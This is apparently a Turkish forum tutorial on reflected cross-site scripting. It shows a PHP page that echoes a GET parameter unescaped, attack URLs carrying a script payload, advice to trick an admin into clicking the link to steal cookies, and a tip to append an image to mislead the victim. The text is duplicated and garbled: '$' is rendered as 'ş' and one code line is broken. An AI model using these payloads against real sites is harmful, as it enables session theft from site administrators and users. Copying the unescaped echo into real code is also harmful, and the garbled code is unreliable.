Bilmemne.Org'ta star.php diye bir dosya olsun.
Php Kodları ise :
Kod:
Kod:
<form action="star.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" />
<input type="submit" value="Go" /></p>
</form>
<?php
echo "<p>Nickiniz
";
echo (ş_GET[name_1]);
?>
Xss açığını yaratan hasarlı kod :
Kod:
echo (ş_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
Kod:
http://hedefsiteadresi.com/star.php?name_1=**********alert(1);</script>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
star.php 'de şu kodlar olsun :
Kod:
here ş_GET['Exploit
Saldırılacak şekil :
Kod:
http://www.bilmemne.org/star.php?Exploit=**********alert(1);</script>
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
[/COLOR]
Php Kodları ise :
Kod:
Kod:
<form action="star.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" />
<input type="submit" value="Go" /></p>
</form>
<?php
echo "<p>Nickiniz
";
echo (ş_GET[name_1]);
?>
Xss açığını yaratan hasarlı kod :
Kod:
echo (ş_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
Kod:
http://hedefsiteadresi.com/star.php?name_1=**********alert(1);</script>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
star.php 'de şu kodlar olsun :
Kod:
here ş_GET['Exploit
Saldırılacak şekil :
Kod:
http://www.bilmemne.org/star.php?Exploit=**********alert(1);</script>
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
[/COLOR]